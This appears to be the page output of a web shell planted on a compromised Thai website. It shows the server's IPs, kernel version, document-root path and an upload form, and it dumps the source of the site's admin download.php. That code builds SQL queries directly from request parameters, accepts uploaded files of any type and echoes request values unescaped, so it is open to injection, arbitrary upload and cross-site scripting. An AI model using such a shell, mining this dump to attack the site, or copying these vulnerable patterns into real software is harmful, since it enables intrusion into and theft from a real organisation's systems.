1337 3YP455 5H311
:
216.73.216.113
:
119.59.104.17 / hrdigest.co.th
:
Linux re1.hostinglotus.net 4.18.0-553.58.1.el8_10.x86_64 #1 SMP Wed Jun 25 06:37:46 EDT 2025 x86_64
:
/
home
/
hrdigest
/
public_html
/
admin
/
UP104D F1L3:
files >> /home/hrdigest/public_html/admin/download.php
<? // *****Copy right 2003 ,TNS NETWORK LTD.,PART.***** // require("../inc/function_admin.php"); $mem = checkid(); if($_GET["action"] == "Delete" && !empty($_GET["i"])){ $row = mysql_fetch_array(mysql_query("Select * From `download` Where `id_download` = '$_GET[i]'")); if(!empty($row["file_name"])) @unlink("../download/file/$row[file_name]"); if(!empty($row["pic"])) @unlink("../download/file/$row[pic]"); mysql_query("Delete From `download` Where `id_download` = '$_GET[i]'"); @header("Location: download.php?cid=$_GET[cid]&cname=$_GET[cname]"); exit; }elseif($_GET["action"] == "Remove" && !empty($_GET["i"])){ $row = mysql_fetch_array(mysql_query("Select * From `download` Where `id_download` = '$_GET[i]'")); if(!empty($row["file_name"])) @unlink("../download/file/$row[file_name]"); if(!empty($row["pic"])) @unlink("../download/file/$row[pic]"); mysql_query("Update `download` Set `file_type` = '', `file_size` = '', `file_name` = '' Where `id_download` = '$_GET[i]'"); @header("Location: download.php?cid=$_GET[cid]&cname=$_GET[cname]&action=Edit&i=$_GET[i]"); exit; }elseif($_GET["action"] == "Remove2" && !empty($_GET["i"])){ $row = mysql_fetch_array(mysql_query("Select * From `download` Where `id_download` = '$_GET[i]'")); if(!empty($row["pic_name"])) @unlink("../download/file/$row[pic_name]"); mysql_query("Update `download` Set `pic_type` = '', `pic_size` = '', `pic_name` = '' Where `id_download` = '$_GET[i]'"); @header("Location: download.php?cid=$_GET[cid]&cname=$_GET[cname]&action=Edit&i=$_GET[i]"); exit; } if(!empty($_POST["action"])){ // Start Program Update And Insert Data Base $a_in = ""; $b_in = ""; $a_up = ""; foreach($_POST as $key => $value){ if(!ereg("action|File|id|Submit", $key)){ $a_in .= "`" . $key . "`, "; $b_in .= "'" . (($value)) . "', "; $a_up .= "`" . $key . "` = '" . (($value)) . "', "; } } $a_in .= "`cid`, `time`, `ip`"; $b_in .= "'$_GET[cid]', '" . time() . "', '" . $_SERVER['REMOTE_ADDR'] . "'"; $a_up .= "`cid` = '$_GET[cid]', `time` = '" . time() . "', `ip` = '" . $_SERVER['REMOTE_ADDR'] . "'"; if(!empty($_FILES)){ foreach($_FILES as $key => $value){ $File = $_POST["File"]; $File_tmp = $_FILES["$key"]["tmp_name"]; $File_name = $_FILES["$key"]["name"]; $File_size = $_FILES["$key"]["size"]; $File_type = $_FILES["$key"]["type"]; if(!empty($File_tmp)){ $_ = explode(".", ereg_replace(" ", "", $File_name)); $md5 = md5(time() . $key); $File_name = substr($md5, 0, 4) . substr($md5, -4, 4) . "." . strtolower($_[count($_) - 1]); if(!empty($File["$key"])) @unlink("../download/file/" . $File["$key"]); @copy($File_tmp, "../download/file/" . $File_name); $a_in .= ", `" . $key . "_type`, `" . $key . "_size`, `" . $key . "_name`"; $b_in .= ", '" . $File_type . "', '" . $File_size . "', '" . $File_name . "'"; $a_up .= ", `" . $key . "_type` = '" . $File_type . "', `" . $key . "_size` = '" . $File_size . "', `" . $key . "_name` = '" . $File_name . "'"; } } } if($_POST["action"] == "Add"){ mysql_query("Insert Into `download` ( $a_in ) Values ( $b_in )"); @header("Location: download.php?cid=$_GET[cid]&cname=$_GET[cname]"); exit; }elseif($_POST["action"] == "Update"){ mysql_query("Update `download` Set $a_up Where `id_download` = '$_GET[i]'"); @header("Location: download.php?cid=$_GET[cid]&cname=$_GET[cname]"); exit; } } ?> <html> <head> <? require("../inc/title.php") ?> <link href="index.css" rel="stylesheet" type="text/css"> <script language="javascript" type="text/javascript" src="wysiwyg.js"></script> <script language="javascript"> <!-- function Delete(i){ if(confirm("คุณต้องการลบข้อมูลนี้หรือไม่ ?")){ if(confirm("ยืนยันการลบอีกครั้ง ?")){ location = "download.php?cid=<? echo $_GET["cid"] ?>&cname=<? echo $_GET["cname"] ?>&action=Delete&i=" + i; } } } function Remove(i){ if(confirm("คุณต้องการลบข้อมูลนี้หรือไม่ ?")){ if(confirm("ยืนยันการลบอีกครั้ง ?")){ location = "download.php?cid=<? echo $_GET["cid"] ?>&cname=<? echo $_GET["cname"] ?>&action=Remove&i=" + i; } } } function Remove2(i){ if(confirm("คุณต้องการลบข้อมูลนี้หรือไม่ ?")){ if(confirm("ยืนยันการลบอีกครั้ง ?")){ location = "download.php?cid=<? echo $_GET["cid"] ?>&cname=<? echo $_GET["cname"] ?>&action=Remove2&i=" + i; } } } --> </script> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> </head> <body bgcolor="#ffffff"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td valign="top"><? top_page() ?></td> </tr> </table> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td width="200" valign="top" background="icon/bgbar.jpg"><? require("menu.php") ?></td> <td valign="top"><table width="95%" border="0" align="center" cellpadding="0" cellspacing="0" class="main"> <tr> <td><table width="100%" border="0" cellspacing="0" cellpadding="0" align="center"> <tr> <td valign="top"><table width="100%" border="0" cellpadding="5" cellspacing="0" class="main"> <tr> <td><b>:: <? echo $_GET["cname"] ?> ::</b></td> <td align="right"><table border="0" cellpadding="0" cellspacing="0"> <tr> <td><a href="<? echo $version1 ?>"><img src="icon/version_01.gif" border="0" /></a></td> <td><img src="icon/version_02.gif" border="0" /></td> <td><a href="<? echo $version2 ?>"><img src="icon/version_03.gif" border="0" /></a></td> </tr> </table></td> </tr> </table></td> </tr> </table> <table width="100%" border="0" cellpadding="0" cellspacing="0" class="main"> <tr> <td><table width="100%" border="0" cellpadding="0" cellspacing="0" class="main"> <tr> <td><table width="100%" border="0" cellpadding="0" cellspacing="0" class="main"> <tr> <td valign="top"><table width="100%" border="0" cellpadding="3" cellspacing="0" class="main border1"> <tr style="background:#6699cc; color:#ffffff;"> <td width="100" align="left" class="border4">Picture</td> <td width="100" align="left" class="border4">Topic</td> <td width="" align="left" class="border4">Detail</td> <td width="60" align="center" class="border4">File</td> <td width="60" align="center" class="border4">Size</td> <td width="60" align="center" class="border4">Sort</td> <td width="60" align="center" class="">Option</td> </tr> <? $result = mysql_query("Select * From `download` Where `cid` = '$_GET[cid]' Order By `sort` Asc, `id_download` Asc"); while($row = mysql_fetch_array($result)){ ?> <tr> <td class="border2 border4" align="center"> <? if (!empty($row[pic_name])) { echo "<img src=../download/file/$row[pic_name] >"; }else{ echo ""; } ?> </td> <td align="left" class="border2 border4"><? echo $row["topic1"] ?> </td> <td align="left" class="border2 border4"><? echo $row["text1"] ?> </td> <td align="center" class="border2 border4"> <? if(!empty($row["file_name"])){ ?> <img style="cursor:pointer;" src="icon/picture1.gif" border="0" onClick="javascript:window.open('../download/file/<? echo $row["file_name"] ?>');" /> <? } ?> </td> <td align="center" class="border2 border4"> <? echo Checksize($row["file_size"]); ?> </td> <td align="center" class="border2 border4"> <? echo $row["sort"] ?> </td> <td align="center" class="border2"><a href="download.php?cid=<? echo $_GET["cid"] ?>&cname=<? echo $_GET["cname"] ?>&action=Edit&i=<? echo $row["id_download"] ?>"><img src="icon/edit3.gif" title="แก้ไข" border="0" /></a> <a href="javascript:Delete('<? echo $row["id_download"] ?>');"><img src="icon/delete3.gif" title="ลบ" border="0" /></a></td> </tr> <? } // End While ?> </table></td> </tr> </table> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><hr size="1" width="95%" /></td> </tr> </table></td> </tr> </table></td> </tr> </table> <? if($_GET["action"] != "Edit"){ ?> <form method="post" enctype="multipart/form-data"> <table width="100%" border="0" cellpadding="5" cellspacing="0" class="main"> <tr> <td height="9"><b>:: Add Data ::</b></td> </tr> </table> <table border="0" cellpadding="2" cellspacing="0" class="main1"> <tr> <td valign="top">1. Topic :</td> <td valign="top"><input type="text" name="topic1" class="main1" style="width:350px;" /></td> </tr> <tr> <td colspan="2" valign="top" height="10"></td> </tr> <tr> <td valign="top">2. Detail :</td> <td valign="top"><textarea name="text1" id="text1" class="main1" style="width:350px;"></textarea> <script language="javascript1.2">generate_wysiwyg('text1', '455', '200');</script></td> </tr> <tr> <td colspan="2" valign="top" height="10"></td> </tr> <tr> <td>3. Picture :</td> <td valign="top" style="padding:0px;"><table border="0" cellpadding="5" cellspacing="0" class="main1"> <tr> <td><input name="pic" type="file" class="main" size="40"></td> <td></td> </tr> </table></td> </tr> <tr> <td height="10" colspan="2"> </td> </tr> <tr> <td>4. File :</td> <td valign="top" style="padding:0px;"><table border="0" cellpadding="5" cellspacing="0" class="main1"> <tr> <td><input type="file" name="file" class="main1" size="40" /></td> <td></td> </tr> </table></td> </tr> <tr> <td colspan="2" valign="top" height="10"></td> </tr> <tr> <td>5. Sort Data :</td> <td valign="top"><input type="text" name="sort" value="0" class="main1" style="width:350px;" /> <font color="#ff0000">*เลขน้อยอยู่บน</font></td> </tr> <tr> <td colspan="2" valign="top" height="10"></td> </tr> <tr> <td></td> <td align="center"> <input type="submit" value="Submit" class="main1" style="width:70px;" /> <input type="hidden" name="action" value="Add" /> </td> </tr> </table> </form> <? }elseif($_GET["action"] == "Edit" && $row = mysql_fetch_array(mysql_query("Select * From `download` Where `id_download` = '$_GET[i]'"))){ ?> <form method="post" enctype="multipart/form-data"> <table width="100%" border="0" cellpadding="5" cellspacing="0" class="main"> <tr> <td height="9"><b>:: Edit Data ::</b></td> </tr> </table> <table border="0" cellpadding="2" cellspacing="0" class="main1"> <tr> <td valign="top">1. Topic :</td> <td valign="top"><input type="text" name="topic1" value="<? echo $row["topic1"] ?>" class="main1" style="width:350px;" /></td> </tr> <tr> <td colspan="2" valign="top" height="10"></td> </tr> <tr> <td valign="top">2. Detail :</td> <td valign="top"><textarea name="text1" id="text1" class="main1" style="width:350px;"><? echo $row["text1"] ?></textarea> <script language="javascript1.2">generate_wysiwyg('text1', '455', '200');</script></td> </tr> <tr> <td colspan="2" valign="top" height="10"></td> </tr> <tr> <td>3. Picture :</td> <td valign="top" style="padding:0px;"><table border="0" cellpadding="5" cellspacing="0" class="main1"> <tr> <td><input name="pic" type="file" class="main1" size="40"></td> <td><? if(!empty($row["pic_name"])){ ?> <img style="cursor:pointer;" src="icon/picture1.gif" border="0" title="View" onClick="javascript:window.open('../download/file/<? echo $row["pic_name"] ?>');" /> <img style="cursor:pointer;" src="icon/picture2.gif" border="0" title="Remove" onClick="javascript:Remove2('<? echo $row["id_download"] ?>');" /> <? } ?></td> </tr> </table></td> </tr> <tr> <td height="10" colspan="2"> </td> </tr> <tr> <td>4. File :</td> <td valign="top" style="padding:0px;"><table border="0" cellpadding="5" cellspacing="0" class="main1"> <tr> <td><input type="file" name="file" class="main1" size="40" /></td> <td> <? if(!empty($row["file_name"])){ ?> <img style="cursor:pointer;" src="icon/picture1.gif" border="0" title="View" onClick="javascript:window.open('../download/file/<? echo $row["file_name"] ?>');" /> <img style="cursor:pointer;" src="icon/picture2.gif" border="0" title="Remove" onClick="javascript:Remove('<? echo $row["id_download"] ?>');" /> <? } ?> </td> </tr> </table></td> </tr> <tr> <td colspan="2" valign="top" height="10"></td> </tr> <tr> <td>5. Sort Data :</td> <td valign="top"><input type="text" name="sort" value="<? echo $row["sort"] ?>" class="main1" style="width:350px;" /> <font color="#ff0000">*เลขน้อยอยู่บน</font></td> </tr> <tr> <td colspan="2" valign="top" height="10"></td> </tr> <tr> <td></td> <td align="center"> <input type="submit" value="Submit" class="main1" style="width:70px;" /> <input type="button" value="Cancel" class="main1" style="width:70px;" onClick="javascript:location='download.php?cid=<? echo $_GET["cid"] ?>&cname=<? echo $_GET["cname"] ?>';" /> <input type="hidden" name="action" value="Update" /> <input type="hidden" name="File[pic]" value="<? echo $row["pic"] ?>" /> <input type="hidden" name="File[file]" value="<? echo $row["file_name"] ?>" /> </td> </tr> </table> </form> <? } // End If Edit ?> </td> </tr> </table></td> </tr> </table> </body> </html>
1337r0j4n | 13379H0575 53CURI7Y 734M